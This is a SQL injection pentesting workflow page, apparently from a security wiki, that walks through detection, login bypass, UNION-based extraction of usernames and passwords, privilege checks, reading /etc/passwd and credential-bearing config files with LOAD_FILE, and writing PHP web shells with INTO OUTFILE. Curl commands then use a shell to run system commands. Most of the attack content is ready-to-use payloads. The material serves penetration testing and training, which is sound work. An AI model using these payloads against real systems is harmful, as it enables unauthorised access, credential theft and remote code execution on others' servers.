Sql Injection Pentesting Workflow

Purpose: Structured methodology for SQL injection identification, exploitation, and post-exploitation during penetration testing engagements.

Quick Reference

Phase

Objective

Key Technique

Detection

Confirm SQLi vulnerability

', ", ), -- -

Column Enum

Determine column count

ORDER BY n / UNION SELECT 1,2,3...

Data Extraction

Retrieve database contents

UNION + INFORMATION_SCHEMA

Privilege Check

Assess exploitation depth

super_priv, user_privileges

File Operations

Read/write system files

LOAD_FILE(), INTO OUTFILE

Code Execution

Establish persistence

Web shell upload

Phase 1: SQLi Detection & Confirmation

1.1 Injection Point Identification

Test input fields systematically with these payloads. Observe for errors, behavioural changes, or time delays.

Detection Payloads

Payload

URL Encoded

Purpose

'

%27

String terminator

"

%22

Double-quote terminator

)

%29

Close parenthesis

#

%23

MySQL comment

;

%3B

Statement terminator

'-- -

%27-- -

String + comment

' OR '1'='1

Boolean true injection

' AND '1'='2

Boolean false injection

' AND SLEEP(5)-- -

Time-based blind detection

Detection Strategy: Compare responses between ' AND '1'='1 (true) and ' AND '1'='2 (false). Different responses confirm boolean-based SQLi.

1.2 Database Fingerprinting

Once SQLi is confirmed, identify the backend DBMS.

-- With query output (Union/Error-based)
SELECT @@version          -- MySQL/MSSQL
SELECT version()          -- PostgreSQL
SELECT banner FROM v$version  -- Oracle

-- Without output (Blind/Time-based)
SELECT SLEEP(5)           -- MySQL (5 second delay confirms)
SELECT pg_sleep(5)        -- PostgreSQL
WAITFOR DELAY '0:0:5'     -- MSSQL

Phase 2: Authentication Bypass

2.1 Standard Bypass Payloads

Use when targeting login forms or authentication mechanisms.

-- Basic bypass (closes string, adds true condition)
admin' or '1'='1
admin' or '1'='1'-- -
admin' or '1'='1'#

-- With parenthesis (common in prepared statements)
admin') or ('1'='1
admin')-- -

-- Bypass as specific user
tom' or '1'='1
tom')-- -

-- Bypass with user ID targeting
any' OR id=5);#
' OR id=1-- -

Context Matters: Analyse error messages to determine quote style (' vs "), parenthesis usage, and comment syntax required.

2.2 Bypass Decision Tree

Login Form Detected
       │
       ▼
Try: admin' or '1'='1
       │
       ├── Success → Access granted
       │
       └── Fail → Try: admin')-- -
                        │
                        ├── Success → Parenthesis-wrapped query
                        │
                        └── Fail → Try: admin" or "1"="1
                                         │
                                         └── Analy error for syntax clues

Phase 3: Union-Based Injection

3.1 Column Count Enumeration

Critical: Union injection requires matching the exact column count of the original query.

Method 1: ORDER BY (Recommended)

' ORDER BY 1-- -    -- Success
' ORDER BY 2-- -    -- Success
' ORDER BY 3-- -    -- Success
' ORDER BY 4-- -    -- Error! → Query has 3 columns

Method 2: UNION SELECT

' UNION SELECT NULL-- -
' UNION SELECT NULL,NULL-- -
' UNION SELECT NULL,NULL,NULL-- -    -- Success → 3 columns

Column Discovery ORDER BY is stealthier (fewer requests). UNION SELECT provides immediate confirmation and identifies displayable columns.

3.2 Identifying Output Columns

Once column count is known, identify which columns render in the response.

-- For 4-column query
cn' UNION SELECT 1,2,3,4-- -

Numbers appearing in the response indicate injectable output positions.

3.3 Data Extraction Templates

Replace the displayable column position with your extraction query.

-- Version extraction (column 2 displays)
cn' UNION SELECT 1,@@version,3,4-- -

-- Current database
cn' UNION SELECT 1,database(),2,3-- -

-- Current user
cn' UNION SELECT 1,user(),3,4-- -

Phase 4: Database Enumeration

4.1 Enumeration Workflow

                    ┌─────────────────┐
                    │ Current Context │
                    │   database()    │
                    │     user()      │
                    └────────┬────────┘
                             │
                             ▼
                    ┌─────────────────┐
                    │ List Databases  │
                    │INFORMATION_SCHEMA│
                    │    .SCHEMATA    │
                    └────────┬────────┘
                             │
                             ▼
                    ┌─────────────────┐
                    │  List Tables    │
                    │INFORMATION_SCHEMA│
                    │     .TABLES     │
                    └────────┬────────┘
                             │
                             ▼
                    ┌─────────────────┐
                    │  List Columns   │
                    │INFORMATION_SCHEMA│
                    │    .COLUMNS     │
                    └────────┬────────┘
                             │
                             ▼
                    ┌─────────────────┐
                    │  Extract Data   │
                    │ SELECT col FROM │
                    │   db.table      │
                    └─────────────────┘

4.2 Enumeration Payloads

Step 1: List All Databases

cn' UNION SELECT 1,schema_name,3,4 FROM INFORMATION_SCHEMA.SCHEMATA-- -

Step 2: List Tables in Target Database

cn' UNION SELECT 1,TABLE_NAME,TABLE_SCHEMA,4 FROM INFORMATION_SCHEMA.TABLES WHERE table_schema='dev'-- -

Step 3: List Columns in Target Table

cn' UNION SELECT 1,COLUMN_NAME,TABLE_NAME,TABLE_SCHEMA FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name='credentials'-- -

-- Alternative: Enumerate 'users' table structure
cn' UNION SELECT 1,COLUMN_NAME,TABLE_NAME,TABLE_SCHEMA FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name='users'-- -

Step 4: Extract Data

-- From specific database.table
cn' UNION SELECT 1,username,password,4 FROM dev.credentials-- -

-- Cross-database extraction
cn' UNION SELECT 1,username,password,4 FROM ilfreight.users-- -

4.3 Concatenation for Single-Column Output

When only one column displays output, concatenate multiple values.

-- MySQL concatenation
cn' UNION SELECT 1,CONCAT(username,':',password),3,4 FROM users-- -

-- With separator
cn' UNION SELECT 1,CONCAT_WS(':',username,password,email),3,4 FROM users-- -

-- GROUP_CONCAT for multiple rows in one result
cn' UNION SELECT 1,GROUP_CONCAT(username,':',password SEPARATOR '<br>'),3,4 FROM users-- -

Phase 5: Privilege Enumeration

5.1 User Context Assessment

-- Current user
cn' UNION SELECT 1,user(),3,4-- -

-- Current user's host
cn' UNION SELECT 1,current_user(),3,4-- -

5.2 Administrative Privilege Check

-- Check for superuser privileges
cn' UNION SELECT 1,super_priv,3,4 FROM mysql.user WHERE user="root"-- -

-- Full privilege enumeration
cn' UNION SELECT 1,grantee,privilege_type,is_grantable FROM information_schema.user_privileges WHERE grantee="'root'@'localhost'"-- -

-- Simplified privilege check
cn' UNION SELECT 1,privilege_type,3,4 FROM information_schema.user_privileges WHERE user="root"-- -

5.3 File Operation Permissions

-- Check secure_file_priv setting
cn' UNION SELECT 1,variable_name,variable_value,4 FROM information_schema.global_variables WHERE variable_name="secure_file_priv"-- -

secure_file_priv Values
Empty string: File operations allowed anywhere
Directory path: File operations restricted to that directory
NULL: File operations completely disabled

Phase 6: File Operations

6.1 Reading Files (LOAD_FILE)

Requirements: FILE privilege, file within secure_file_priv path, readable by MySQL user.

-- Read passwd file
cn' UNION SELECT 1,LOAD_FILE("/etc/passwd"),3,4-- -

-- Read web application source
cn' UNION SELECT 1,LOAD_FILE("/var/www/html/index.php"),3,4-- -

-- Read configuration files
cn' UNION SELECT 1,LOAD_FILE("/var/www/html/config.php"),3,4-- -
cn' UNION SELECT 1,LOAD_FILE("/var/www/html/search.php"),3,4-- -

High-Value File Targets

File Path

Purpose

/etc/passwd

User enumeration

/etc/shadow

Password hashes (requires root)

/var/www/html/config.php

Database credentials

/var/www/html/wp-config.php

WordPress credentials

/var/www/html/.htaccess

Apache configuration

/etc/apache2/sites-available/000-default.conf

Virtual host config

/etc/mysql/my.cnf

MySQL configuration

6.2 Writing Files (INTO OUTFILE)

Requirements: FILE privilege, writable secure_file_priv path, destination writable by MySQL.

-- Test write capability
SELECT 'file written successfully!' INTO OUTFILE '/var/www/html/proof.txt';

-- Via injection
cn' UNION SELECT 1,'Write test',3,4 INTO OUTFILE '/var/www/html/test.txt'-- -

Phase 7: Web Shell Deployment

7.1 PHP Web Shell Upload

-- Minimal web shell
cn' UNION SELECT "",'<?php system($_REQUEST[0]); ?>',"","" INTO OUTFILE '/var/www/html/shell.php'-- -

-- Alternative shell (GET parameter)
cn' UNION SELECT "",'<?php system($_GET["cmd"]); ?>',"","" INTO OUTFILE '/var/www/html/cmd.php'-- -

-- More functional shell
cn' UNION SELECT "",'<?php if(isset($_REQUEST["c"])){echo "<pre>".shell_exec($_REQUEST["c"])."</pre>";}?>',"","" INTO OUTFILE '/var/www/html/s.php'-- -

7.2 Web Shell Usage

# Using the shell (0 parameter)
curl "http://target.com/shell.php?0=id"
curl "http://target.com/shell.php?0=whoami"
curl "http://target.com/shell.php?0=cat%20/etc/passwd"

# Using cmd parameter version
curl "http://target.com/cmd.php?cmd=id"

7.3 Common Web Root Paths

Distribution/Stack

Web Root

Debian/Ubuntu Apache

/var/www/html/

CentOS/RHEL Apache

/var/www/html/

Nginx (default)

/usr/share/nginx/html/

XAMPP

/opt/lampp/htdocs/

Windows XAMPP

C:/xampp/htdocs/

Windows IIS

C:/inetpub/wwwroot/

MySQL Operator Precedence

Understanding precedence is critical for crafting working payloads.

Priority

Operators

1 (Highest)

Division /, Multiplication *, Modulus %

Addition +, Subtraction -

Comparison =, >, <, <=, >=, !=, LIKE

NOT !

AND &&

6 (Lowest)

OR ||

Why ' OR '1'='1 Works The query SELECT * FROM users WHERE user='' OR '1'='1' evaluates user='' first (false), then '1'='1' (true). Since false OR true = true, all rows return.

MySQL CLI Reference

Connection

mysql -u root -h host.example.eu -P 3306 -p

Database Operations

SHOW DATABASES;                          -- List databases
USE database_name;                       -- Switch database
SHOW TABLES;                             -- List tables
DESCRIBE table_name;                     -- Show table structure

Table Operations

-- Create
CREATE TABLE logins (
    id INT AUTO_INCREMENT PRIMARY KEY,
    username VARCHAR(50),
    password VARCHAR(255)
);

-- Insert
INSERT INTO table_name VALUES (value1, value2, ...);
INSERT INTO table_name (col1, col2) VALUES (val1, val2);

-- Update
UPDATE table_name SET column1=value1 WHERE condition;

-- Delete
DROP TABLE table_name;

Column Operations

ALTER TABLE logins ADD newColumn INT;
ALTER TABLE logins RENAME COLUMN old TO new;
ALTER TABLE logins MODIFY column DATE;
ALTER TABLE logins DROP column;

Query Modifiers

SELECT * FROM logins ORDER BY column1;           -- Ascending
SELECT * FROM logins ORDER BY column1 DESC;      -- Descending
SELECT * FROM logins ORDER BY col1 DESC, id ASC; -- Multi-column

SELECT * FROM logins LIMIT 2;                    -- First 2 rows
SELECT * FROM logins LIMIT 1, 2;                 -- 2 rows from offset 1

SELECT * FROM logins WHERE username LIKE 'admin%';  -- Wildcard match

Payload Quick Reference

Authentication Bypass

admin' or '1'='1
admin')-- -
' or '1'='1'-- -
' or 1=1-- -
') or ('1'='1
") or ("1"="1

Union Injection Template

' ORDER BY 1-- -
' UNION SELECT 1,2,3,4-- -
' UNION SELECT 1,@@version,3,4-- -
' UNION SELECT 1,database(),3,4-- -
' UNION SELECT 1,user(),3,4-- -

INFORMATION_SCHEMA Queries

-- Databases
' UNION SELECT 1,schema_name,3,4 FROM INFORMATION_SCHEMA.SCHEMATA-- -

-- Tables
' UNION SELECT 1,table_name,3,4 FROM INFORMATION_SCHEMA.TABLES WHERE table_schema='TARGET_DB'-- -

-- Columns
' UNION SELECT 1,column_name,3,4 FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name='TARGET_TABLE'-- -

File Operations

-- Read
' UNION SELECT 1,LOAD_FILE('/etc/passwd'),3,4-- -

-- Write
' UNION SELECT 1,'content',3,4 INTO OUTFILE '/var/www/html/file.txt'-- -

-- Web Shell
' UNION SELECT "",'<?php system($_REQUEST[0]); ?>',"","" INTO OUTFILE '/var/www/html/shell.php'-- -

Troubleshooting

Issue

Possible Cause

Solution

No output from UNION

Wrong column count

Increment columns in ORDER BY

Syntax error

Quote mismatch

Try " instead of '

Comment not working

Wrong syntax

Try # or -- - (space after --)

LOAD_FILE returns NULL

Insufficient privileges

Check FILE privilege

OUTFILE fails

secure_file_priv restriction

Check allowed directories

Numbers not displaying

Columns are non-displayable

Try different column positions

Resources

PreviousLiving-Off-the-Land Binaries (LOLBins) for AD enumeration NextPost-Exploitation

Last updated 2 days ago